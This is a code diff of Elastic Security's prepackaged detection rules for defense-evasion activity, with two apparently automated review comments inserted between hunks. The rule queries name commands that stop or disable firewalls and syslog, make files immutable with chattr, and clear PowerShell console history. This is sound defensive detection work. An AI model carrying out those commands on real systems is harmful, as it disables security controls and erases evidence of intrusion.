@@ -13,15 +13,34 @@
"language": "kuery",
"license": "Elastic License v2",
"name": "Attempt to Delete an Okta Network Zone",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
"query": "event.dataset:okta.system and event.action:zone.delete\n",
"references": [
"https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm",
"https://developer.okta.com/docs/reference/api/system-log/",
"https://developer.okta.com/docs/reference/api/event-types/"
],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
"risk_score": 47,
"rule_id": "c749e367-a069-4a73-b1f2-43a3798153ad",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
"severity": "medium",
"tags": [
"Elastic",
@@ -29,9 +48,34 @@
"Okta",
"Continuous Monitoring",
"SecOps",
- "Network Security"
+ "Network Security",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.007",
+ "name": "Disable or Modify Cloud Firewall",
+ "reference": "https://attack.mitre.org/techniques/T1562/007/"
+ }
+ ]
+ }
+ ]
+ }
],
"timestamp_override": "event.ingested",
"type": "query",
- "version": 4
+ "version": 6
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_gatekeeper.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_gatekeeper.json
index 8a1f1482e603a..7a1d31f145db2 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_gatekeeper.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_gatekeeper.json
@@ -16,6 +16,23 @@
"https://support.apple.com/en-us/HT202491",
"https://community.carbonblack.com/t5/Threat-Advisories-Documents/TAU-TIN-Shlayer-OSX/ta-p/68397"
],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ }
+ ],
"risk_score": 47,
"rule_id": "4da13d6e-904f-4636-81d8-6ab14b4e6ae9",
"severity": "medium",
@@ -45,5 +62,5 @@
],
"timestamp_override": "event.ingested",
"type": "query",
- "version": 2
+ "version": 3
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_iptables_or_firewall.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_iptables_or_firewall.json
deleted file mode 100644
index 3eb5f25298c72..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_iptables_or_firewall.json
+++ /dev/null
@@ -1,52 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic.",
- "from": "now-9m",
- "index": [
- "auditbeat-*",
- "logs-endpoint.events.*"
- ],
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "Attempt to Disable IPTables or Firewall",
- "query": "event.category:process and event.type:(start or process_started) and\n process.name:ufw and process.args:(allow or disable or reset) or\n\n (((process.name:service and process.args:stop) or\n (process.name:chkconfig and process.args:off) or\n (process.name:systemctl and process.args:(disable or stop or kill))) and\n process.args:(firewalld or ip6tables or iptables))\n",
- "risk_score": 47,
- "rule_id": "125417b8-d3df-479f-8418-12d7e034fee3",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Host",
- "Linux",
- "Threat Detection",
- "Defense Evasion"
- ],
- "threat": [
- {
- "framework": "MITRE ATT&CK",
- "tactic": {
- "id": "TA0005",
- "name": "Defense Evasion",
- "reference": "https://attack.mitre.org/tactics/TA0005/"
- },
- "technique": [
- {
- "id": "T1562",
- "name": "Impair Defenses",
- "reference": "https://attack.mitre.org/techniques/T1562/",
- "subtechnique": [
- {
- "id": "T1562.001",
- "name": "Disable or Modify Tools",
- "reference": "https://attack.mitre.org/techniques/T1562/001/"
- }
- ]
- }
- ]
- }
- ],
- "timestamp_override": "event.ingested",
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_syslog_service.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_syslog_service.json
index 610648df94d37..b2c0bf5ad3282 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_syslog_service.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_disable_syslog_service.json
@@ -12,6 +12,28 @@
"license": "Elastic License v2",
"name": "Attempt to Disable Syslog Service",
"query": "event.category:process and event.type:(start or process_started) and\n ((process.name:service and process.args:stop) or\n (process.name:chkconfig and process.args:off) or\n (process.name:systemctl and process.args:(disable or stop or kill)))\n and process.args:(syslog or rsyslog or \"syslog-ng\")\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
"risk_score": 47,
"rule_id": "2f8a1226-5720-437d-9c20-e0029deb6194",
"severity": "medium",
@@ -48,5 +70,5 @@
],
"timestamp_override": "event.ingested",
"type": "query",
- "version": 7
+ "version": 8
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_application_credential_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_application_credential_modification.json
index 5f96b81247942..6c745d65f7e48 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_application_credential_modification.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_application_credential_modification.json
@@ -14,13 +14,37 @@
"language": "kuery",
"license": "Elastic License v2",
"name": "Azure Application Credential Modification",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
"query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Update application - Certificates and secrets management\" and event.outcome:(success or Success)\n",
"references": [
"https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/"
],
+ "related_integrations": [
+ {
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.auditlogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
"risk_score": 47,
"rule_id": "1a36cace-11a7-43a8-9a10-b497c5a02cd3",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
"severity": "medium",
"tags": [
"Elastic",
@@ -56,5 +80,5 @@
],
"timestamp_override": "event.ingested",
"type": "query",
- "version": 4
+ "version": 6
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_automation_runbook_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_automation_runbook_deleted.json
new file mode 100644
index 0000000000000..951277d09f1b0
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_automation_runbook_deleted.json
@@ -0,0 +1,73 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion.",
+ "from": "now-25m",
+ "index": [
+ "filebeat-*",
+ "logs-azure*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Azure Automation Runbook Deleted",
+ "note": "",
+ "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE\" and \n event.outcome:(Success or success)\n",
+ "references": [
+ "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor",
+ "https://github.com/hausec/PowerZure",
+ "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a",
+ "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/"
+ ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "8ddab73b-3d15-4e5d-9413-47f05553c1d7",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "low",
+ "tags": [
+ "Elastic",
+ "Cloud",
+ "Azure",
+ "Continuous Monitoring",
+ "SecOps",
+ "Configuration Audit",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": []
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 7
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_blob_permissions_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_blob_permissions_modified.json
index 2b299df062662..b0ba35b1e6c15 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_blob_permissions_modified.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_blob_permissions_modified.json
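Review bot: `related_integrations` in this new rule carries an `"integration": "activitylogs"` entry, while the Azure auditlogs rules elsewhere in this diff (for example the application-credential rule in the previous hunk) list only `package` and `version`; if that asymmetry is deliberate because auditlogs is the package default, a line in the PR description saying so would stop reviewers from flagging it, otherwise the auditlogs entries look incomplete. The `threat` block has `"technique": []` under TA0005, so the rule maps to a tactic without any technique, which the schema presumably permits but is worth confirming against the upstream rule. The file is newly added yet starts at `"version": 7`, which reads as a value carried over from the upstream detection-rules repository rather than this repository's own history; if that is the convention it is fine, but it is not stated here.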
@@ -13,13 +13,38 @@
"language": "kuery",
"license": "Elastic License v2",
"name": "Azure Blob Permissions Modification",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION\" or\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION\") and \n event.outcome:(Success or success)\n",
+ "note": "",
+ "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION\" or\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION\") and\n event.outcome:(Success or success)\n",
"references": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles"
],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
"risk_score": 47,
"rule_id": "d79c4b2a-6134-4edd-86e6-564a92a933f9",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
"severity": "medium",
"tags": [
"Elastic",
@@ -48,5 +73,5 @@
],
"timestamp_override": "event.ingested",
"type": "query",
- "version": 1
+ "version": 3
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_diagnostic_settings_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_diagnostic_settings_deletion.json
index d9f70f88a23b7..5ec2a183daeea 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_diagnostic_settings_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_diagnostic_settings_deletion.json
@@ -14,13 +14,38 @@
"language": "kuery",
"license": "Elastic License v2",
"name": "Azure Diagnostic Settings Deletion",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
"query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE\" and event.outcome:(Success or success)\n",
"references": [
"https://docs.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings"
],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
"risk_score": 47,
"rule_id": "5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
"severity": "medium",
"tags": [
"Elastic",
@@ -56,5 +81,5 @@
],
"timestamp_override": "event.ingested",
"type": "query",
- "version": 5
+ "version": 7
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_service_principal_addition.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_service_principal_addition.json
index c715ea42e4b7e..508c453971304 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_service_principal_addition.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_azure_service_principal_addition.json
@@ -14,15 +14,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Service Principal Addition", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Azure Service Principal Addition\n\nService Principals are identities used by applications, services, and automation tools to access specific resources.\nThey grant specific access based on the assigned API permissions. Most organizations that work a lot with Azure AD make\nuse of service principals. Whenever an application is registered, it automatically creates an application object and a\nservice principal in an Azure AD tenant.\n\nThis rule looks for the addition of service principals. This behavior may enable attackers to impersonate legitimate\nservice principals to camouflage their activities among noisy automations/apps.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the user who issued the command. Do they look normal for the user?\n- Consider the time of day. 
If the user is a human, not a program or script, did the activity take place during a normal\ntime of day?\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the account's commands, API calls, and data management actions in the last 24 hours.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add service principal\" and event.outcome:(success or Success)\n", "references": [ "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/", "https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal" ], - "risk_score": 47, + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 21, "rule_id": "60b6b72f-0fbc-47e7-9895-9ba7627a8b50", - "severity": "medium", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", "tags": [ "Elastic", "Cloud", @@ -57,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_base16_or_base32_encoding_or_decoding_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_base16_or_base32_encoding_or_decoding_activity.json
index 1cc353f1add3a..b71a2e82ba198 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_base16_or_base32_encoding_or_decoding_activity.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_base16_or_base32_encoding_or_decoding_activity.json
@@ -15,6 +15,23 @@
"license": "Elastic License v2",
"name": "Base16 or Base32 Encoding/Decoding Activity",
"query": "event.category:process and event.type:(start or process_started) and\n process.name:(base16 or base32 or base32plain or base32hex)\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
"risk_score": 21,
"rule_id": "debff20a-46bc-4a4d-bae5-5cdd14222795",
"severity": "low",
@@ -49,5 +66,5 @@
],
"timestamp_override": "event.ingested",
"type": "query",
- "version": 7
+ "version": 8
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_chattr_immutable_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_chattr_immutable_file.json
new file mode 100644
index 0000000000000..970589b6bd209
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_chattr_immutable_file.json
@@ -0,0 +1,82 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.).",
+ "from": "now-9m",
+ "index": [
+ "auditbeat-*",
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "max_signals": 33,
+ "name": "File made Immutable by Chattr",
+ "note": "",
+ "query": "process where event.type == \"start\" and user.name == \"root\" and process.executable : \"/usr/bin/chattr\" and process.args : (\"-*i*\", \"+*i*\") and not process.parent.executable: \"/lib/systemd/systemd\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Host",
+ "Linux",
+ "Threat Detection",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1222",
+ "name": "File and Directory Permissions Modification",
+ "reference": "https://attack.mitre.org/techniques/T1222/",
+ "subtechnique": [
+ {
+ "id": "T1222.002",
+ "name": "Linux and Mac File and Directory Permissions Modification",
+ "reference": "https://attack.mitre.org/techniques/T1222/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_console_history.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_console_history.json
index 28958ec2d724f..93b4478f846a0 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_console_history.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_console_history.json
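Review bot: `"max_signals": 33` in this new rule is a value no other rule in these hunks sets (the rest rely on the default), so it is worth confirming it is intentional rather than a transcription slip from the upstream rule. The `description` string has a stray space in `(e.g .ssh, /etc/passwd, etc.)`, which should read `(e.g. .ssh, /etc/passwd, etc.)`. The `query` exclusion `not process.parent.executable: "/lib/systemd/systemd"` is not explained anywhere, since `note` is `""` and `setup` only carries the `event.ingested` text; a one-line reason in `note` for why systemd-spawned chattr is excluded would help anyone tuning the rule later understand what the exclusion gives up.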
@@ -12,15 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Clearing Windows Console History", - "note": "## Triage and analysis\n\n### Investigating Clearing Windows Console History\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of\nlogging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the\nexecution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be\ntrying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Console History\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of\nlogging commands: the built-in history and the command history managed by the PSReadLine module. 
This rule looks for the\nexecution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be\ntrying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility.",
 "query": "process where event.action == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or process.pe.original_file_name == \"PowerShell.EXE\") and\n (process.args : \"*Clear-History*\" or\n (process.args : (\"*Remove-Item*\", \"rm\") and process.args : (\"*ConsoleHost_history.txt*\", \"*(Get-PSReadlineOption).HistorySavePath*\")) or\n (process.args : \"*Set-PSReadlineOption*\" and process.args : \"*SaveNothing*\"))\n",
 "references": [
 "https://stefanos.cloud/kb/how-to-clear-the-powershell-command-history/",
 "https://www.shellhacks.com/clear-history-powershell/",
 "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
